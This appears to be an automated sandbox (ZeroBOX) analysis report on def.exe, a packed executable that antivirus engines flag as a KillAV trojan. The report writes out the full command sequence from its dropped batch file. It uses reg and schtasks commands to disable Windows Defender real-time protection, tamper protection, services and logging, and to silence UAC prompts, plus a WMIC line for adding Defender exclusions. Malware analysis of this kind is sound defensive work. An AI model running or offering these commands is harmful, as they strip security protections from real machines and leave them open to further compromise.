Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 28, 2021, 12:01 p.m.	March 28, 2021, 12:05 p.m.

Size	118.8KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`04a666d7cf692764645f28189bdb2e70`
SHA256	`79dd688046ef9f26ed0cf633cab305f18b46ce7affaa396813a9587ac2918bb0`
CRC32	`AD4098D6`
ssdeep	`3072:X8FHdppuOf+wMSHjnywM0vY9t8Qkh+nXeuS:MFPMOf+wMAywM0EJksnXJS`
Yara	PE_Header_Zero - PE File Signature Zero win_files_operation - Affect private profile IsPE32 - (no description) IsWindowsGUI - (no description) HasOverlay - Overlay Check HasRichSignature - Rich Signature Check

def.exe "C:\Users\test22\AppData\Local\Temp\def.exe"
112
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat" "
  1824
  - reg.exe reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
    1304
  - reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
    1976
  - reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    1812
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    1760
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    2660
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    2656
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    1032
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    604
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    1468
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    2444
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    1972
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    812
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    2112
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    2312
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    2832
  - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    1892
  - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    2948
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    1296
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    2768
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    2840
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    2976
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    1868
  - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    668
  - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    2560
  - reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3032
  - reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    2800
  - reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    2760
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    2724
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    2648
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    2232
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3104
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3148

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 28, 2021, 12:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:01 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 28, 2021, 12:01 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 28, 2021, 12:01 p.m.			0	0

Command line console output was observed (50 out of 173 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: Exclusion in WD can be easily set with an elevated cmd, so that makes it super easy to damage any pc. console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="xxxxxx console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: To disable System Guard Runtime Monitor Broker console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: To disable Windows Defender Security Center include this console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: rem console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: 1 - Disable Real-time protection console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\7zS6318.tmp> console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2021, 12:01 p.m.	buffer: reg console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 28, 2021, 12:01 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sxdata

The executable uses a known packer (1 event)

packer

Armadillo v1.71

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 28, 2021, 12:01 p.m.	process_identifier: 112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d72000 process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat

Creates a suspicious process (5 events)

cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Uses Windows utilities for basic Windows functionality (32 events)

cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat
file	C:\Users\test22\AppData\Local\Temp\7zS6318.tmp

Attempts to modify UAC prompt behavior (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet

Disables Windows Security features (13 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to disable windows defender	registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

MicroWorld-eScan	Trojan.GenericKD.36583912
ALYac	Trojan.GenericKD.36583912
Cylance	Unsafe
VIPRE	Trojan.Win32.Generic!BT
AegisLab	Trojan.Win32.Agent.4!c
Sangfor	Trojan.Win32.Ymacco.AA79
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	Trojan:Win32/KillAV.14f7215e
K7GW	Riskware ( 0040eff71 )
Arcabit	Trojan.Generic.D22E39E8
ESET-NOD32	BAT/KillAV.NFF
Kaspersky	Trojan.Win32.Agent.xahhhi
BitDefender	Trojan.GenericKD.36583912
Avast	FileRepMalware
Ad-Aware	Trojan.GenericKD.36583912
McAfee-GW-Edition	RDN/Generic.dx
FireEye	Trojan.GenericKD.36583912
Emsisoft	Trojan.GenericKD.36583912 (B)
APEX	Malicious
Webroot	W32.Malware.Gen
Avira	BAT/KillAV.gyfuy
MAX	malware (ai score=80)
Microsoft	Trojan:Win32/Ymacco.AA79
ZoneAlarm	Trojan.Win32.Agent.xahhhi
GData	Trojan.GenericKD.36583912
Cynet	Malicious (score: 90)
McAfee	RDN/Generic.dx
VBA32	Trojan.Wacatac
Ikarus	Trojan.BAT.KillAV
Fortinet	BAT/KillAV.NFF!tr
AVG	FileRepMalware
Panda	Trj/CI.A
Qihoo-360	Win32/Trojan.KillAV.HykCI3wA

Stops Windows services (5 events)

service	WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start)
service	WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start)
service	WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start)
service	WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start)
service	WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start)

def.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All